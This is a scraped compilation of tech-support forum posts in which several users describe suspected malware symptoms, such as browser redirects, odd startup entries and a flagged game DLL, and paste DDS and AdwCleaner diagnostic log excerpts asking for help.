2015-08-18 06:50:04 1795072 ----a-w- C:\WINDOWS\System32\AppXDeploymentExtensions.dll
2015-08-18 06:49:52 1061888 ----a-w- C:\WINDOWS\System32\reseteng.dll
2015-08-18 06:49:20 246272 ----a-w- C:\WINDOWS\System32\PackageStateRoaming.dll
2015-08-18 06:49:03 274432 ----a-w- C:\WINDOWS\SysWow64\NetSetupShim.dll
2015-08-18 06:36:08 1226752 ----a-w- C:\WINDOWS\SysWow64\wcnwiz.dll
2015-08-18 06:35:49 100352 ----a-w- C:\WINDOWS\SysWow64\WcnApi.dll
2015-08-18 06:35:18 95744 ----a-w- C:\WINDOWS\SysWow64\fdWCN.dll
2015-08-18 06:34:44 37376 ----a-w- C:\WINDOWS\SysWow64\wfdprov.dll
2015-08-18 06:29:11 1593344 ----a-w- C:\WINDOWS\SysWow64\dwmcore.dll
2015-08-18 06:26:08 195584 ----a-w- C:\WINDOWS\SysWow64\PackageStateRoaming.dll
2015-08-17 02:27:15 113880 ----a-w- C:\WINDOWS\System32\drivers\0B1C68F6.sys
2015-08-14 14:43:59 911360 ----a-w- C:\WINDOWS\System32\SharedStartModel.dll
2015-08-14 04:51:31 18960 ----a-w- C:\WINDOWS\System32\drivers\LNonPnP.sys
2015-08-14 04:51:06 0 ----a-w- C:\WINDOWS\ativpsrm.bin
2015-08-13 04:22:26 2093056 ----a-w- C:\WINDOWS\System32\wlidsvc.dll
2015-08-13 04:20:39 414208 ----a-w- C:\WINDOWS\System32\AppXDeploymentClient.dll
2015-08-13 03:53:21 311808 ----a-w- C:\WINDOWS\SysWow64\AppXDeploymentClient.dll
2015-08-12 16:03:57 733696 ----a-w- C:\WINDOWS\System32\SkyDriveTelemetry.dll
2015-08-12 15:58:57 15360 ----a-w- C:\WINDOWS\System32\wu.upgrade.ps.dll
2015-08-12 07:18:36 9284296 ----a-w- C:\WINDOWS\SysWow64\FlashPlayerInstaller.exe
2015-08-11 10:04:24 2462648 ----a-w- C:\WINDOWS\System32\mfcore.dll
2015-08-11 10:04:23 4532304 ----a-w- C:\WINDOWS\explorer.exe
2015-08-11 10:04:15 1087296 ----a-w- C:\WINDOWS\System32\mfplat.dll
2015-08-11 10:03:09 442208 ----a-w- C:\WINDOWS\System32\drivers\storport.sys
2015-08-11 10:02:57 554744 ----a-w- C:\WINDOWS\System32\directmanipulation.dll
2015-08-11 10:02:56 80720 ----a-w- C:\WINDOWS\System32\drivers\stornvme.sys
2015-08-11 10:02:49 292856 ----a-w- C:\WINDOWS\System32\LockAppHost.exe
2015-08-11 09:52:49 993104 ----a-w- C:\WINDOWS\System32\ReAgent.dll
2015-08-11 09:50:47 1643872 ----a-w- C:\WINDOWS\System32\diagtrack.dll
2015-08-11 09:40:22 4048808 ----a-w- C:\WINDOWS\SysWow64\explorer.exe
2015-08-11 09:40:12 918320 ----a-w- C:\WINDOWS\SysWow64\mfplat.dll
2015-08-11 09:40:08 2151208 ----a-w- C:\WINDOWS\SysWow64\mfcore.dll
2015-08-11 09:38:22 454000 ----a-w- C:\WINDOWS\SysWow64\directmanipulation.dll
2015-08-11 09:37:48 243800 ----a-w- C:\WINDOWS\SysWow64\LockAppHost.exe
2015-08-11 09:26:03 845664 ----a-w- C:\WINDOWS\SysWow64\ReAgent.dll
2015-08-11 09:23:59 16706560 ----a-w- C:\WINDOWS\System32\Windows.UI.Xaml.dll
2015-08-11 09:21:13 148992 ----a-w- C:\WINDOWS\System32\tetheringservice.dll
2015-08-11 09:21:04 52224 ----a-w- C:\WINDOWS\System32\tetheringclient.dll
2015-08-11 09:20:02 483328 ----a-w- C:\WINDOWS\System32\OneDriveSettingSyncProvider.dll
2015-08-11 09:19:45 235520 ----a-w- C:\WINDOWS\System32\SettingsHandlers_Notifications.dll
2015-08-11 09:18:44 235008 ----a-w- C:\WINDOWS\System32\UserMgrProxy.dll
2015-08-11 09:16:32 2416640 ----a-w- C:\WINDOWS\System32\MFMediaEngine.dll
2015-08-11 09:14:02 404480 ----a-w- C:\WINDOWS\System32\diagtrack_wininternal.dll
2015-08-11 09:13:42 413184 ----a-w- C:\WINDOWS\System32\diagtrack_win.dll
2015-08-11 09:11:40 2446336 ----a-w- C:\WINDOWS\System32\InputService.dll
2015-08-11 09:11:18 553472 ----a-w- C:\WINDOWS\System32\GamePanel.exe
.
============= FINISH: 12:51:19.27 ===============

Attached Files

	attach.txt (21.8 KB)
	AdwCleaner[C1].txt (7.9 KB)

Well hello,

I'm a newcomer in this forum. The fact is that I've been handling my W7 OS quite laggy. Last night every single time I tried to post something in a forum, it was giving me force close every time I tried to copy and paste a link :banghead:. I already downloaded Kaspersky Antivirus full protection but there's that notification appearing still and it wasn't unable to delete it hence I'm here. Fortunately I came across this another thread which is opened in this forum (http://www.techsupportforum.com/foru...ic-738745.html), therefore here are my logs:

TDSSKiller #1: TDSSKiller1 - Pastebin.com
TDSSKiller #2: TDSSKiller2 - Pastebin.com
AdwCleaner: ADWCleaner - Pastebin.com

(I really hope I'm not breaking any rule by sharing these logs using pastebin but I wouldn't like to paste them all here since they're too long).

Beside of that, this is what I know so far about the trojan or whatever it is, also its location...

UDSDangerousObject.Multi.Generic
E:\CODEX\bin\steam_api.dll

Thanks in advance, guys!

When I try to start Base Filtering Engine in Services it says:

'Windows could not start the Base Filtering Engine service on Local Computer - Error 5: Access is denied'

I do not have access to a Windows Install disc or Boot CD

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 9.0.8112.16684 BrowserJavaVersion: 11.31.2
Run by User at 18:02:39 on 2015-08-31
Microsoft® Windows Vista™ Home Premium 6.0.6002.2.1252.44.1033.18.2046.970 [GMT 1:00]
.
AV: avast! Antivirus *Enabled/Updated* {17AD7D40-BA12-9C46-7131-94903A54AD8B}
SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: avast! Antivirus *Enabled/Updated* {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\nvvsvc.exe
C:\Windows\system32\svchost.exe -k rpcss
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Program Files (x86)\Creative\Shared Files\CTAudSvc.exe
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\SLsvc.exe
C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
C:\Windows\system32\nvvsvc.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\alg.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Windows\SysWOW64\PnkBstrA.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Windows\system32\SearchIndexer.exe
C:\Program Files (x86)\Spybot - Search & Destroy\SDWinSec.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Canon\MyPrinter\BJMYPRT.EXE
C:\Windows\ehome\ehtray.exe
C:\Windows\SysWOW64\CtHelper.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\Windows Media Player\wmpnscfg.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Windows\ehome\ehmsas.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Program Files (x86)\Google\Update\Install\{CC7A4147-B277-48F9-B90B-6A84AADA9CCB}\44.0.2403.157_44.0.2403.155_chrome_updater.exe
C:\Windows\TEMP\CR_376D0.tmp\setup.exe
C:\Program Files\AVAST Software\Avast\AvastSvc.exe
C:\Program Files\AVAST Software\Avast\avastUi.exe
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uSearch Bar = Preserve
mWinlogon: Userinit = userinit.exe,
BHO: Adobe PDF Link Helper: {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
BHO: Java(tm) Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_31\bin\ssv.dll
BHO: avast! Online Security: {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
BHO: Java(tm) Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_31\bin\jp2ssv.dll
uRun: [ehTray.exe] C:\Windows\ehome\ehTray.exe
uRun: [WMPNSCFG] C:\Program Files (x86)\Windows Media Player\WMPNSCFG.exe
mRun: [CTxfiHlp] CTXFIHLP.EXE
mRun: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
mRun: [Adobe Reader Speed Launcher] "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe"
mRun: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
mRun: [CanonSolutionMenuEx] "C:\Program Files (x86)\Canon\Solution Menu EX\CNSEMAIN.EXE" /logon
mRun: [AsioThk32Reg] REGSVR32.EXE /S CTASIO.DLL
mRun: [CTHelper] CTHELPER.EXE
mRun: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
mRun: [AvastUI.exe] "C:\Program Files\AVAST Software\Avast\AvastUI.exe" /nogui
dRun: [DevconDefaultDB] C:\Windows\System32\READREG /SILENT /FAIL=1
dRun: [ZoneAlarm Windows 10 Upgrader] "C:\ProgramData\CheckPoint\ZoneAlarm\Data\Updates\unpacked==win10=update_win10.zip\upgrade.exe" /delay
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-Explorer: BindDirectlyToPropertySetStorage = dword:0
mPolicies-System: EnableUIADesktopToggle = dword:0
mPolicies-System: SoftwareSASGeneration = dword:1
.
INFO: HKCU has more than 50 listed domains.
If you wish to scan all of them, select the 'Force scan all domains' option.
.
.
INFO: HKLM has more than 50 listed domains.
If you wish to scan all of them, select the 'Force scan all domains' option.
.
DPF: {166B1BCA-3F9C-11CF-8075-444553540000} - hxxp://fpdownload.macromedia.com/get/shockwave/cabs/director/sw.cab
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
TCP: NameServer = 192.168.1.254
TCP: Interfaces\{9FBE1644-D6A2-4D7F-8F37-1FF16088AAC4} : DHCPNameServer = 192.168.1.254
TCP: Interfaces\{D0F0DAD0-C795-47B6-8324-59C767D47CD1} : DHCPNameServer = 172.20.10.1
LSA: Security Packages = kerberos msv1_0 schannel wdigest tspkg
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\44.0.2403.155\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
x64-BHO: avast! Online Security: {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll
x64-BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
x64-Run: [Windows Defender] C:\Program Files (x86)\Windows Defender\MSASCui.exe -hide
x64-Run: [CanonMyPrinter] C:\Program Files\Canon\MyPrinter\BJMyPrt.exe /logon
x64-mPolicies-Explorer: NoActiveDesktop = dword:1
x64-mPolicies-Explorer: NoActiveDesktopChanges = dword:1
x64-mPolicies-Explorer: BindDirectlyToPropertySetStorage = dword:0
x64-mPolicies-System: EnableUIADesktopToggle = dword:0
x64-mPolicies-System: SoftwareSASGeneration = dword:1
.
INFO: x64-HKLM has more than 50 listed domains.
If you wish to scan all of them, select the 'Force scan all domains' option.
.
Hosts: 127.0.0.1 Spyware Info | Spyware Info
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\rqaa93y2.default-1388514397121\
FF - plugin: C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AIR\nppdf32.dll
FF - plugin: C:\Program Files (x86)\Canon\Easy-PhotoPrint EX\NPEZFFPI.DLL
FF - plugin: C:\Program Files (x86)\Google\Update\1.3.28.1\npGoogleUpdate3.dll
FF - plugin: C:\Program Files (x86)\Java\jre1.8.0_31\bin\dtplugin\npdeployJava1.dll
FF - plugin: C:\Program Files (x86)\Java\jre1.8.0_31\bin\plugin2\npjp2.dll
FF - plugin: c:\Program Files (x86)\Microsoft Silverlight\5.1.40728.0\npctrlui.dll
FF - plugin: C:\Program Files (x86)\Veetle\Player\npvlc.dll
FF - plugin: C:\Program Files (x86)\Veetle\plugins\npVeetle.dll
FF - plugin: C:\Program Files (x86)\Veetle\VLCBroadcast\npvbp.dll
.
============= SERVICES / DRIVERS ===============
.
R0 aswVmm;avast! VM Monitor;C:\Windows\System32\drivers\aswVmm.sys [2015-8-31 274808]
R1 aswSnx;aswSnx;C:\Windows\System32\drivers\aswsnx.sys [2015-8-31 1048344]
R1 aswSP;aswSP;C:\Windows\System32\drivers\aswSP.sys [2015-8-31 447944]
R2 aswHwid;avast! HardwareID;C:\Windows\System32\drivers\aswHwid.sys [2015-8-31 28656]
R2 aswMonFlt;aswMonFlt;C:\Windows\System32\drivers\aswMonFlt.sys [2015-8-31 90968]
R2 avast! Antivirus;Avast Antivirus;C:\Program Files\AVAST Software\Avast\AvastSvc.exe [2015-8-31 146600]
R2 FontCache;Windows Font Cache Service;C:\Windows\System32\svchost.exe -k LocalServiceAndNoImpersonation [2009-8-30 27648]
R2 SBSDWSCService;SBSD Security Center Service;C:\Program Files (x86)\Spybot - Search & Destroy\SDWinSec.exe [2010-5-29 1153368]
R3 aswStmXP;Avast StreamFilter Driver;C:\Windows\System32\drivers\aswStmXP.sys [2015-8-31 210936]
R3 COMMONFX.SYS;COMMONFX.SYS;C:\Windows\System32\drivers\COMMONFX.sys [2009-6-23 158744]
R3 CTAUDFX.SYS;CTAUDFX.SYS;C:\Windows\System32\drivers\CTAUDFX.sys [2009-6-23 706584]
R3 CTSBLFX.SYS;CTSBLFX.SYS;C:\Windows\System32\drivers\CTSBLFX.sys [2009-6-23 680984]
S0 aswRvrt;avast! Revert;C:\Windows\System32\drivers\aswRvrt.sys [2015-8-31 65224]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2013-9-11 105144]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2013-9-11 124088]
S3 c65013264;C-Media CM6501 Like Sound UDAX Interface;C:\Windows\System32\drivers\c6501.sys [2009-8-27 1095168]
S3 COMMONFX;COMMONFX;C:\Windows\System32\drivers\COMMONFX.sys [2009-6-23 158744]
S3 Creative Audio Engine Licensing Service;Creative Audio Engine Licensing Service;C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\CTAELicensing.exe [2009-8-28 79360]
S3 CTAUDFX;CTAUDFX;C:\Windows\System32\drivers\CTAUDFX.sys [2009-6-23 706584]
S3 CTERFXFX.SYS;CTERFXFX.SYS;C:\Windows\System32\drivers\CTERFXFX.sys [2009-6-23 141848]
S3 CTERFXFX;CTERFXFX;C:\Windows\System32\drivers\CTERFXFX.sys [2009-6-23 141848]
S3 CTSBLFX;CTSBLFX;C:\Windows\System32\drivers\CTSBLFX.sys [2009-6-23 680984]
S3 Netaapl;Apple Mobile Device Ethernet Service;C:\Windows\System32\drivers\netaapl64.sys [2013-7-25 23040]
S3 PerfHost;Performance Counter DLL Host;C:\Windows\SysWOW64\perfhost.exe [2009-8-30 19968]
S3 USBAAPL64;Apple Mobile USB Driver;C:\Windows\System32\drivers\usbaapl64.sys [2014-8-16 54784]
S3 WPFFontCache_v0400;Windows Presentation Foundation Font Cache 4.0.0.0;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WPF\WPFFontCache_v0400.exe [2013-9-11 1012344]
S4 clr_optimization_v2.0.50727_64;Microsoft .NET Framework NGEN v2.0.50727_X64;C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe [2014-8-13 90776]
SUnknown snoanxmw;snoanxmw; [x]
.
=============== File Associations ===============
.
FileExt: .js: JSFile=C:\Windows\SysWOW64\WScript.exe "%1" %*
FileExt: .jse: JSEFile=C:\Windows\SysWOW64\WScript.exe "%1" %*
.
=============== Created Last 30 ================
.
.
==================== Find3M ====================
.
2015-08-31 16:07:38 1048344 ----a-w- C:\Windows\System32\drivers\aswsnx.sys
2015-08-31 16:05:32 65224 ----a-w- C:\Windows\System32\drivers\aswTdi.sys
2015-08-31 16:05:32 210936 ----a-w- C:\Windows\System32\drivers\aswStmXP.sys
2015-08-31 16:05:30 274808 ----a-w- C:\Windows\System32\drivers\aswVmm.sys
2015-08-31 16:05:29 90968 ----a-w- C:\Windows\System32\drivers\aswMonFlt.sys
2015-08-31 16:05:29 65224 ----a-w- C:\Windows\System32\drivers\aswRvrt.sys
2015-08-31 16:05:29 447944 ----a-w- C:\Windows\System32\drivers\aswSP.sys
2015-08-31 16:05:29 378880 ----a-w- C:\Windows\System32\aswBoot.exe
2015-08-31 16:05:29 28656 ----a-w- C:\Windows\System32\drivers\aswHwid.sys
2015-08-31 16:05:28 64712 ----a-w- C:\Windows\System32\drivers\aswRdr.sys
2015-08-31 16:03:47 43112 ----a-w- C:\Windows\avastSS.scr
2015-08-04 23:03:08 877152 ----a-w- C:\Windows\SysWow64\msvcr120_clr0400.dll
2015-08-04 23:03:08 538208 ----a-w- C:\Windows\SysWow64\msvcp120_clr0400.dll
2015-08-04 22:53:26 872528 ----a-w- C:\Windows\System32\msvcr120_clr0400.dll
2015-08-04 22:53:26 681552 ----a-w- C:\Windows\System32\msvcp120_clr0400.dll
2015-07-31 22:31:08 48128 ----a-w- C:\Windows\System32\atmlib.dll
2015-07-31 22:08:07 34304 ----a-w- C:\Windows\SysWow64\atmlib.dll
2015-07-31 21:46:51 219648 ----a-w- C:\Windows\SysWow64\d3d10_1core.dll
2015-07-31 21:46:51 189952 ----a-w- C:\Windows\SysWow64\d3d10core.dll
2015-07-31 21:46:51 160768 ----a-w- C:\Windows\SysWow64\d3d10_1.dll
2015-07-31 21:46:51 1029120 ----a-w- C:\Windows\SysWow64\d3d10.dll
2015-07-31 21:44:47 287232 ----a-w- C:\Windows\System32\d3d10core.dll
2015-07-31 21:44:46 327680 ----a-w- C:\Windows\System32\d3d10_1core.dll
2015-07-31 21:44:46 196096 ----a-w- C:\Windows\System32\d3d10_1.dll
2015-07-31 21:44:46 1268224 ----a-w- C:\Windows\System32\d3d10.dll
2015-07-31 21:26:53 2796032 ----a-w- C:\Windows\System32\win32k.sys
2015-07-31 21:25:35 372736 ----a-w- C:\Windows\System32\atmfd.dll
2015-07-31 21:10:54 2002944 ----a-w- C:\Windows\System32\d3d10warp.dll
2015-07-31 21:09:43 566272 ----a-w- C:\Windows\System32\d3d10level9.dll
2015-07-31 21:00:29 834048 ----a-w- C:\Windows\System32\d2d1.dll
2015-07-31 20:59:16 1561088 ----a-w- C:\Windows\System32\DWrite.dll
2015-07-31 20:59:07 1154560 ----a-w- C:\Windows\System32\FntCache.dll
2015-07-31 20:41:22 1172480 ----a-w- C:\Windows\SysWow64\d3d10warp.dll
2015-07-31 20:40:42 486400 ----a-w- C:\Windows\SysWow64\d3d10level9.dll
2015-07-31 20:35:10 682496 ----a-w- C:\Windows\SysWow64\d2d1.dll
2015-07-31 20:33:57 1072640 ----a-w- C:\Windows\SysWow64\DWrite.dll
2015-07-31 20:33:04 297472 ----a-w- C:\Windows\SysWow64\atmfd.dll
2015-07-31 20:03:52 124624 ----a-w- C:\Windows\System32\PresentationCFFRasterizerNative_v0300.dll
2015-07-31 19:27:52 103120 ----a-w- C:\Windows\SysWow64\PresentationCFFRasterizerNative_v0300.dll
2015-07-28 09:59:08 132483416 ----a-w- C:\Windows\System32\mrt.exe
2015-07-22 22:08:45 17889792 ----a-w- C:\Windows\System32\mshtml.dll
2015-07-22 21:59:09 448512 ----a-w- C:\Windows\System32\html.iec
2015-07-22 21:56:02 2344448 ----a-w- C:\Windows\System32\jscript9.dll
2015-07-22 21:55:11 10936832 ----a-w- C:\Windows\System32\ieframe.dll
2015-07-22 21:50:54 1387520 ----a-w- C:\Windows\System32\urlmon.dll
2015-07-22 21:50:18 1392128 ----a-w- C:\Windows\System32\wininet.dll
2015-07-22 21:49:21 2158080 ----a-w- C:\Windows\System32\iertutil.dll
2015-07-22 21:49:10 1494016 ----a-w- C:\Windows\System32\inetcpl.cpl
2015-07-22 21:48:52 237056 ----a-w- C:\Windows\System32\url.dll
2015-07-22 21:48:43 86016 ----a-w- C:\Windows\System32\jsproxy.dll
2015-07-22 21:48:23 173568 ----a-w- C:\Windows\System32\ieUnatt.exe
2015-07-22 21:48:18 599040 ----a-w- C:\Windows\System32\vbscript.dll
2015-07-22 21:48:17 816640 ----a-w- C:\Windows\System32\jscript.dll
2015-07-22 21:48:07 729088 ----a-w- C:\Windows\System32\msfeeds.dll
2015-07-22 21:47:40 453120 ----a-w- C:\Windows\System32\dxtmsft.dll
2015-07-22 21:47:36 282112 ----a-w- C:\Windows\System32\dxtrans.dll
2015-07-22 21:47:32 55296 ----a-w- C:\Windows\System32\msfeedsbs.dll
2015-07-22 21:47:26 11264 ----a-w- C:\Windows\System32\msfeedssync.exe
2015-07-22 21:47:22 96768 ----a-w- C:\Windows\System32\mshtmled.dll
2015-07-22 21:47:12 2382848 ----a-w- C:\Windows\System32\mshtml.tlb
2015-07-22 21:47:03 12800 ----a-w- C:\Windows\System32\mshta.exe
2015-07-22 21:46:51 248320 ----a-w- C:\Windows\System32\ieui.dll
2015-07-22 20:54:48 367616 ----a-w- C:\Windows\SysWow64\html.iec
2015-07-22 20:54:00 12386816 ----a-w- C:\Windows\SysWow64\mshtml.dll
2015-07-22 20:51:20 1810432 ----a-w- C:\Windows\SysWow64\jscript9.dll
2015-07-22 20:47:59 9751040 ----a-w- C:\Windows\SysWow64\ieframe.dll
2015-07-22 20:46:44 1139712 ----a-w- C:\Windows\SysWow64\urlmon.dll
2015-07-22 20:46:19 1129472 ----a-w- C:\Windows\SysWow64\wininet.dll
2015-07-22 20:45:50 1427968 ----a-w- C:\Windows\SysWow64\inetcpl.cpl
2015-07-22 20:45:16 231936 ----a-w- C:\Windows\SysWow64\url.dll
2015-07-22 20:45:05 65536 ----a-w- C:\Windows\SysWow64\jsproxy.dll
2015-07-22 20:44:56 142848 ----a-w- C:\Windows\SysWow64\ieUnatt.exe
2015-07-22 20:44:39 421888 ----a-w- C:\Windows\SysWow64\vbscript.dll
2015-07-22 20:44:22 718336 ----a-w- C:\Windows\SysWow64\jscript.dll
2015-07-22 20:44:18 1804288 ----a-w- C:\Windows\SysWow64\iertutil.dll
2015-07-22 20:44:16 607744 ----a-w- C:\Windows\SysWow64\msfeeds.dll
2015-07-22 20:43:58 41472 ----a-w- C:\Windows\SysWow64\msfeedsbs.dll
2015-07-22 20:43:58 353792 ----a-w- C:\Windows\SysWow64\dxtmsft.dll
2015-07-22 20:43:47 223232 ----a-w- C:\Windows\SysWow64\dxtrans.dll
2015-07-22 20:43:37 10752 ----a-w- C:\Windows\SysWow64\msfeedssync.exe
2015-07-22 20:43:30 73216 ----a-w- C:\Windows\SysWow64\mshtmled.dll
2015-07-22 20:43:20 2382848 ----a-w- C:\Windows\SysWow64\mshtml.tlb
2015-07-22 20:43:19 11776 ----a-w- C:\Windows\SysWow64\mshta.exe
2015-07-22 20:42:40 176640 ----a-w- C:\Windows\SysWow64\ieui.dll
2015-07-21 20:59:25 1586304 ----a-w- C:\Windows\System32\ntdll.dll
2015-07-21 20:59:25 1168600 ----a-w- C:\Windows\SysWow64\ntdll.dll
2015-07-21 15:50:53 68544 ----a-w- C:\Windows\System32\drivers\mountmgr.sys
2015-07-21 15:50:53 4690880 ----a-w- C:\Windows\System32\ntoskrnl.exe
2015-07-21 15:50:52 154048 ----a-w- C:\Windows\System32\drivers\ecache.sys
2015-07-21 15:41:14 11264 ----a-w- C:\Windows\System32\msmmsp.dll
2015-07-21 15:40:45 399360 ----a-w- C:\Windows\System32\emdmgmt.dll
2015-07-21 15:40:37 85504 ----a-w- C:\Windows\System32\csrsrv.dll
2015-07-18 15:41:47 80384 ----a-w- C:\Windows\System32\basesrv.dll
2015-07-11 17:13:15 12901888 ----a-w- C:\Windows\System32\shell32.dll
2015-07-11 15:56:09 11587584 ----a-w- C:\Windows\SysWow64\shell32.dll
2015-07-10 19:37:10 1402368 ----a-w- C:\Windows\SysWow64\msxml6.dll
2015-07-10 19:37:10 1253376 ----a-w- C:\Windows\SysWow64\msxml3.dll
2015-07-10 19:37:09 2067968 ----a-w- C:\Windows\SysWow64\mstscax.dll
2015-07-10 19:35:34 1875968 ----a-w- C:\Windows\System32\msxml3.dll
2015-07-10 19:35:34 1796096 ----a-w- C:\Windows\System32\msxml6.dll
.
============= FINISH: 18:03:53.45 ===============

Attached Files

attach.txt (4.5 KB)

Hello!

We've had some issues with browser pop-ups in our house for a few months, and we weren't able to figure out what the issue was. This affects every laptop and android device in the house, though not constantly.

The issue is that, every once in a while when we click on a link or open a new tab/page, there is a browser redirect (on android) or popup (laptops) to the following address:
http://ad-type.google.com/sh.aspx?f=...d1b83443fbc54d
This then directs to http://www.tradeadexchange.com/ and then to some scary-looking page full of warnings of outdated Java or something and links which nobody is stupid enough to click on, thankfully.
E.g.
http://www.tradeadexchange.com/a/dis...28611445186973
(This is a warning page)Warning!

Lots of internet help pages we originally looked at indicated that it might be a router issue, but a total reset hasn't fixed the problem for more than a few minutes.

Any help would be greatly appreciated. I purchased a brand new laptop today and would like to actually enjoy using it...

Thanks so much!! :smile:

Hello all

In an attempt to make my laptop faster on startup, I went into Norton's Performance section and reviewed all programs launching on startup. Something strange I noticed is this
screenshot on imgur

"Windows Command Processor" is mentioned 3 times here. It is not mentioned when reviewing startup programs with Task Manager. On top of that, I cannot disable them as they re-enable themselves when I try to, while others can be disabled.

This "issue" is only present on my laptop and not on my PC, which uses the same anti virus and a lot of the same programs.

Full system scan with Norton and Malwarebytes did not bring up anything, so I'm not even sure if it's malware/spyware. Better to be safe than sorry though. I have no clue why it's mentioned 3 times and why it cannot be disabled. Apparently keyloggers work this way, although I am no expert on the subject so feel free to correct me.

Any input is very appreciated. OS is Windows 10, laptop is an Acer Aspire V3 -722G.

Thanks in advance

I just reinstalled windows 7 because of many problems that I was encountering no matter what I tried to do to fix them nothing ever worked. I came across your site while trying to troubleshoot as to why my cmd.exe would not stay open still after a fresh install of windows. I have suspected my PC has been remotely controlled for some time now but could never figure it out exactly enough to logically explain this to someone. I would really appreciate if someone could shed some light on this situation for me. I attached the files for review.

Thanks in advance,

Brooke:ermm:

Attached Files

	dds.txt (19.5 KB)
	attach.txt (4.8 KB)

System Restore is no longer creating automatic restore points and is not retaining manually created points.
It also shows a Runtime error message and that message seems to cause Microsoft Help and Support pop up message to crash.
This happens also on opening Safe Mode.
I had posted this in the Vista forums but SpywareDr thought that there might be spyware or Malware involved and suggested checking this out.
I have run extensive antivirus checks but all have come up clean.

Dear Sirs

I recently opened a email from BrianandSally, Brian and Sally are my stepbrother's daughter & her husband.

After opening the email I have found that Google keeps locking and the only way to get out of it is to open Task Master and Close Down Google.

Could you help please?

Jack Willday

Hello

In an attempt to make my laptop faster on startup, I went into Norton's Performance section and reviewed all programs launching on startup. Something strange I noticed is "Windows Command Processor". It is mentioned 3 times in Norton's startup review. It is not mentioned when reviewing startup programs with Task Manager. On top of that, I cannot disable them as they re-enable themselves when I try to, while others can be disabled.

This "issue" is only present on my laptop and not on my PC, which uses the same anti virus and a lot of the same programs.

Full system scan with Norton and Malwarebytes did not bring up anything, so I'm not even sure if it's malware/spyware. Better to be safe than sorry though. I have no clue why it's mentioned 3 times and why it cannot be disabled. Apparently keyloggers work this way, although I am no expert on the subject so feel free to correct me.

Any input is very appreciated. OS is Windows 10, laptop is an Acer Aspire V3 -722G.


I ran the dds.scr.

Attach.txt should be included to this post, and the logs are posted below.

Although it is a legit copy of Windows 10 - upgraded from 8.1 - I do not have access to a Windows disc, however a factory reset is possible if it happens to be a serious threat and cannot be removed otherwise. I'd like to keep that as a last resort, however.

Thank you for your time and expertise and I await further instructions.
Logs:

DDS (Ver_2012-11-20.01) - NTFS_AMD64
